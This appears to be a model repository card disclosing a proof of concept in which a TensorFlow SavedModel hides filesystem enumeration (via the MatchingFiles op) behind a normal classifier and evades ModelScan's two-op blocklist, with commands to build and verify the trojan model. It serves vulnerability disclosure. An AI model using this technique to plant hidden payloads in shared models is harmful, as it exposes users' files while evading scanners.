YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
ModelScan TF SavedModel Scanner Bypass PoC
Finding: MFV-VULN-05
ModelScan's SavedModelTensorflowOpScan only blocks 2 TensorFlow ops: ReadFile and WriteFile.
TensorFlow has 1,471 raw ops, 96 of which are file-related. This PoC demonstrates filesystem
access via unblocked ops that ModelScan does not detect.
Proof
The trojan-classifier/ directory contains a TF SavedModel that:
- Appears normal:
predict()function performs standard image classification (784โ10 dense layer) - Hidden payload:
preprocess()function usesMatchingFilesop to enumerate the filesystem
Ops in the model (from saved_model.pb):
MatchingFilesโ filesystem glob โ NOT in ModelScan blocklistStringFormatโ data formatting โ NOT in ModelScan blocklist- Standard ops: MatMul, Softmax, AddV2 (legitimate ML operations)
ModelScan result: CLEAN (no detections)
Reproduction
pip install tensorflow
python3 huntr-tf-savedmodel-poc-v2.py build # Creates trojan model
python3 huntr-tf-savedmodel-poc-v2.py verify # Demonstrates filesystem enumeration
python3 huntr-tf-savedmodel-poc-v2.py scan-check # Shows ModelScan misses the payload
Environment
- TensorFlow 2.20.0
- Python 3.13
- Downloads last month
- -
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐ Ask for provider support